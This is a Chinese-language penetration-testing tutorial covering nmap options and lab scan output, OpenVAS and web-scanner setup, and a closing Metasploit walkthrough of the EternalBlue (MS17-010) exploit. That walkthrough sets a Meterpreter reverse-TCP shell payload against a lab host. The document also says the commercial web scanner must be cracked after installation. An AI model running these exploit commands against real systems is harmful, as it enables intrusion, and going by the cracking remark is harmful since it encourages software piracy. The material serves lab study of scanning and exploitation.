扫描技术

发现目标环境中有哪些资产,联网设备,主机,服务器,各种服务等.可以通过网络漏洞扫描,全面掌握目标服务器存在的安全漏洞.市面上常用的扫描有Nessus、NeXpose、OpenVAS等

  • 漏洞扫描原理

网络漏洞扫描指的是利用一些自动化工具发现网络上各类主机设备的安全漏洞.这些自动化工具通常称为漏洞扫描器.漏洞扫描通常可以分为两类,黑盒扫描和白盒扫描.

  • 黑盒扫描

黑盒扫描一般都是通过远程识别服务的类型和版本,对服务是否存在漏洞进行判定.在一些最新的漏洞扫描软件中,应用了一些更高级的技术,比如模拟渗透攻击等.

  • 白盒扫描

白盒扫描就是在具有主机操作权限的情况下进行漏洞扫描.比如微软的补丁更新程序会定期对你的操作系统进行扫描,查找存在的安全漏洞,并向你推送相应的操作系统补丁.白盒扫描的结果更加准确,但一般来说它所识别出的漏洞不应当作为外部渗透测试的最终数据,因为这些漏洞由于防火墙和各类防护软件的原因很可能无法在外部渗透测试中得到利用.同时,一般情况下你是没有机会获取用户名和口令.漏洞扫描器一般会附带一个用于识别主机漏洞的特征库,并定期进行更新.在漏洞扫描的时候,就是利用特征库里的脚本与目标系统的反馈信息进行匹配,如果能够匹配上,就说明存在某一个漏洞.漏洞扫描器在识别漏洞的过程中,会向目标发送大量的数据包,有时候会导致目标系统拒绝服务或被扫描数据包阻塞,扫描行为也会被对方的入侵检测设备发现.漏洞扫描器扫描出的结果通常会有很多误报(报告发现的漏洞实际并不存在)或者漏报(未报告发现漏洞但漏洞实际存在).因此,需要对扫描结果进行人工分析,确定哪些漏是实际存在的,这个过程就叫做漏洞验证.这是渗透测试过程中不可缺少的一步,只有验证漏洞存在的真实性,才能对漏洞进行深度利用.渗透测试工作中,在得到客户认可的情况下,可以使用扫描器进行扫描,但使用时一定要注意规避风险,对其系统运行可能造成的影响将到最低.

nmap

跨平台,在没有指定端口的情况下,默认扫描1~1000端口

参数 结果
-sP/-sn ping 扫描
-p 80 指定80端口
-p 1-80 指定1-80端口
-p 80,3389 指定80,3389端口
-p- 指定1-65535端口
-sT TCP 全链接扫描
-sS SYN 半连接扫描
-sN Null 扫描
-sX Xmas 扫描
-sF Fin 扫描
-sV 显示服务的详细版本
-sV 服务版本探测
-O 启用操作系统探测
-A 全面扫描
-oN/-oX 保存扫描结果txt/xml
-T0~-T5 时序选项
root@kali:~# nmap 10.0.0.0/24 -sP
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:36 CST
Nmap scan report for 10.0.0.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.0.0.2
Host is up (0.000098s latency).
MAC Address: 00:50:56:EF:31:20 (VMware)
Nmap scan report for 10.0.0.7
Host is up (0.00020s latency).
MAC Address: 00:0C:29:19:02:C3 (VMware)
Nmap scan report for 10.0.0.254
Host is up (0.00015s latency).
MAC Address: 00:0C:29:E5:20:37 (VMware)
Nmap scan report for 10.0.0.221
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.06 seconds
root@kali:~# nmap 10.0.0.7 -p-       
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:37 CST
Nmap scan report for 10.0.0.7
Host is up (0.0011s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
9200/tcp open  wap-wsp
9300/tcp open  vrace
MAC Address: 00:0C:29:19:02:C3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
root@kali:~# nmap 10.0.0.0/24 -p 80    
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:38 CST
Nmap scan report for 10.0.0.1
Host is up (0.00027s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 10.0.0.2
Host is up (0.00011s latency).

PORT   STATE  SERVICE
80/tcp closed http
MAC Address: 00:50:56:EF:31:20 (VMware)

Nmap scan report for 10.0.0.7
Host is up (0.00024s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:19:02:C3 (VMware)

Nmap scan report for 10.0.0.254
Host is up (0.000073s latency).

PORT   STATE    SERVICE
80/tcp filtered http
MAC Address: 00:0C:29:E5:20:37 (VMware)

Nmap scan report for 10.0.0.221
Host is up (0.000052s latency).

PORT   STATE  SERVICE
80/tcp closed http

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.47 seconds
root@kali:~# nmap 10.0.0.7 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-10 13:38 CST
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:07 remaining)
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:09 remaining)
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:39 (0:00:10 remaining)
Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 13:40 (0:00:26 remaining)
Nmap scan report for 10.0.0.7
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 5f:4b:28:0f:20:9f:b7:dc:a7:25:9a:fc:d7:31:a0:63 (RSA)
|   256 e4:a3:00:75:0d:a3:39:a0:98:38:fe:5b:a8:62:04:f8 (ECDSA)
|_  256 f5:48:1e:be:c8:d6:f6:a1:76:9e:a7:24:42:f7:dc:80 (ED25519)
80/tcp   open  http     nginx 1.18.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: \xE7\xA5\x9E\xE5\x87\xBA\xE9\xAC\xBC\xE6\xB2\xA1\xE7\x9A\x84Enderman - long long ago,I was born.
3306/tcp open  mysql    MySQL 5.7.28
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.28
|   Thread ID: 1268
|   Capabilities flags: 65535
|   Some Capabilities: SupportsLoadDataLocal, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, Support41Auth, SupportsCompression, FoundRows, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, LongPassword, InteractiveClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: &fbK?\x08\Q\x1AT%]6"?2\x0Cxy8
|_  Auth Plugin Name: 79
9200/tcp open  wap-wsp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     content-type: application/json; charset=UTF-8
|     content-length: 492
|     "name" : "node-1",
|     "cluster_name" : "elasticsearch",
|     "cluster_uuid" : "RpKAqucdQR6DbP8QChZ6CA",
|     "version" : {
|     "number" : "6.7.0",
|     "build_flavor" : "default",
|     "build_type" : "rpm",
|     "build_hash" : "8453f77",
|     "build_date" : "2019-03-21T15:32:29.844721Z",
|     "build_snapshot" : false,
|     "lucene_version" : "7.7.0",
|     "minimum_wire_compatibility_version" : "5.6.0",
|     "minimum_index_compatibility_version" : "5.0.0"
|     "tagline" : "You Know, for Search"
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: DELETE,GET,HEAD
|     content-type: text/plain; charset=UTF-8
|     content-length: 0
|   Help, SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     content-type: application/json; charset=UTF-8
|     content-length: 203
|     {"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"text is empty (possibly HTTP/0.9)"}],"type":"illegal_argument_exception","reason":"text is empty (possibly HTTP/0.9)"},"status":400}
|   RTSPRequest: 
|     HTTP/1.1 200 OK
|     Allow: DELETE,GET,HEAD
|     content-type: text/plain; charset=UTF-8
|_    content-length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9200-TCP:V=7.70%I=7%D=12/10%Time=5FD1B463%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,243,"HTTP/1\.0\x20200\x20OK\r\ncontent-type:\x20application/j
SF:son;\x20charset=UTF-8\r\ncontent-length:\x20492\r\n\r\n{\n\x20\x20\"nam
SF:e\"\x20:\x20\"node-1\",\n\x20\x20\"cluster_name\"\x20:\x20\"elasticsear
SF:ch\",\n\x20\x20\"cluster_uuid\"\x20:\x20\"RpKAqucdQR6DbP8QChZ6CA\",\n\x
SF:20\x20\"version\"\x20:\x20{\n\x20\x20\x20\x20\"number\"\x20:\x20\"6\.7\
SF:.0\",\n\x20\x20\x20\x20\"build_flavor\"\x20:\x20\"default\",\n\x20\x20\
SF:x20\x20\"build_type\"\x20:\x20\"rpm\",\n\x20\x20\x20\x20\"build_hash\"\
SF:x20:\x20\"8453f77\",\n\x20\x20\x20\x20\"build_date\"\x20:\x20\"2019-03-
SF:21T15:32:29\.844721Z\",\n\x20\x20\x20\x20\"build_snapshot\"\x20:\x20fal
SF:se,\n\x20\x20\x20\x20\"lucene_version\"\x20:\x20\"7\.7\.0\",\n\x20\x20\
SF:x20\x20\"minimum_wire_compatibility_version\"\x20:\x20\"5\.6\.0\",\n\x2
SF:0\x20\x20\x20\"minimum_index_compatibility_version\"\x20:\x20\"5\.0\.0\
SF:"\n\x20\x20},\n\x20\x20\"tagline\"\x20:\x20\"You\x20Know,\x20for\x20Sea
SF:rch\"\n}\n")%r(HTTPOptions,67,"HTTP/1\.0\x20200\x20OK\r\nAllow:\x20DELE
SF:TE,GET,HEAD\r\ncontent-type:\x20text/plain;\x20charset=UTF-8\r\ncontent
SF:-length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20200\x20OK\r\nAll
SF:ow:\x20DELETE,GET,HEAD\r\ncontent-type:\x20text/plain;\x20charset=UTF-8
SF:\r\ncontent-length:\x200\r\n\r\n")%r(Help,12B,"HTTP/1\.0\x20400\x20Bad\
SF:x20Request\r\ncontent-type:\x20application/json;\x20charset=UTF-8\r\nco
SF:ntent-length:\x20203\r\n\r\n{\"error\":{\"root_cause\":\[{\"type\":\"il
SF:legal_argument_exception\",\"reason\":\"text\x20is\x20empty\x20\(possib
SF:ly\x20HTTP/0\.9\)\"}\],\"type\":\"illegal_argument_exception\",\"reason
SF:\":\"text\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)\"},\"status\":400
SF:}")%r(SSLSessionReq,12B,"HTTP/1\.0\x20400\x20Bad\x20Request\r\ncontent-
SF:type:\x20application/json;\x20charset=UTF-8\r\ncontent-length:\x20203\r
SF:\n\r\n{\"error\":{\"root_cause\":\[{\"type\":\"illegal_argument_excepti
SF:on\",\"reason\":\"text\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)\"}\]
SF:,\"type\":\"illegal_argument_exception\",\"reason\":\"text\x20is\x20emp
SF:ty\x20\(possibly\x20HTTP/0\.9\)\"},\"status\":400}");
MAC Address: 00:0C:29:19:02:C3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.23 ms 10.0.0.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.01 seconds
  • -sSSYN 半连接扫描

QQ截图20201210134720.png

  • -sTTCP 全链接扫描

QQ截图20201210134755.png

OpenVAS

OpenVAS安装

推荐从官网下载ISO镜像进行安装镜像下载地址

  • 新建虚拟机

分卷压缩,下载后分别改为对应名称再解压成iso镜像

20200424172003741.png

  1. 系统:linux
  2. 版本:其他Linux 64位
  3. 内存:4G
  4. 硬盘:20G
  5. CPUS:2个
  6. gsm-ce-6.0.3.iso

QQ截图20201210141501.png

QQ截图20201210141511.png

QQ截图20201210143931.png

QQ截图20201210143939.png

QQ截图20201210143955.png

  • 开启虚拟机进行安装

QQ截图20201210144222.png

QQ截图20201210144231.png

  • 等待3分钟左右

QQ截图20201210144830.png

  • 之后输入密码确认

QQ截图20201210144704.png

QQ截图20201210150307.png

QQ截图20201210150318.png

QQ截图20201210150334.png

  • 登录

QQ截图20201210150829.png

QQ截图20201210150618.png

QQ截图20201210150638.png

QQ截图20201210150710.png

QQ截图20201210150801.png

  • 在About栏我们可以查看当前的IP地址

QQ截图20201210151028.png

QQ截图20201210151034.png

QQ截图20201210151312.png

OpenVAS使用

QQ截图20201210151312.png

  • 新建一个扫描目标

QQ截图20201210151945.png

QQ截图20201210153135.png

  • 新建一个扫描任务

QQ截图20201210153259.png

QQ截图20201210153502.png

  • 开始扫描

QQ截图20201210153538.png

Web漏洞扫描

随着互联网的发展以及云计算的发展,使得政府、银行、企业以及各个组织基本上都有自己的门户网站.Web 应用越来越多,同时Web 应用的攻击成本、难度都比较低,Web 应用成为黑客攻击的主要目标.无论黑客出于什么样的目的,Web 应用所面临的挑战都是很大的.如何及时、快速发现Web 应用安全漏洞,并且修补安全漏洞,减轻或消除Web 安全风险成为安全行业的重要课题.小型Web 应用几十上百个页面,大型的Web 应用成千上万个页面.如果靠人工的方式去检测每个页面的安全性,显然,这个成本是难以估计的.所以,我们需要借助于自动化工具,帮助审计员去发现Web 安全漏洞.这些自动化工具就是Web 漏洞扫描器.市面上Web 漏洞扫描器有很多,其中以IBM 公司的AppScan 和商业化Web 漏洞扫描器AWVS 为优秀.

  • Web漏洞扫描原理

进行Web漏洞扫描的时候,大致分为一下几个步骤

  1. 爬行网站目录
  2. 使用漏洞脚本扫描
  3. 保存扫描结果

安装过程下一步,完成后需要破解

QQ截图20201210163133.png

QQ截图20201210163100.png

创建扫描目标

QQ截图20201210163230.png

QQ截图20201210164855.png

QQ截图20201210165322.png

QQ截图20201210165351.png

QQ截图20201210165802.png

QQ截图20201210165941.png

  • 用户和密码都是test

QQ截图20201210170520.png

扫描结果分析

  • 可以将漏洞点依次展开,可以看到含有漏洞的页面,以及造成漏洞的参数.同时在右侧边栏,可以看到漏洞的详细信息.包括漏洞描述和测试payload.

保存扫描报告

  • 可以将扫描结果保存下来.保存的扫描结果文件的后缀名是[.wvs].如果安装了虚拟打印机,也可以将扫描结果保存成pdf 格式,便于传阅.

永恒之蓝漏洞复现

  • 工具: msfconsole msf
msfconsole
search MS17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
#目标靶机ip
set RHOST 10.0.0.5
#本机IP
set LHOST 10.0.0.221
exploit

QQ截图20201210173347.png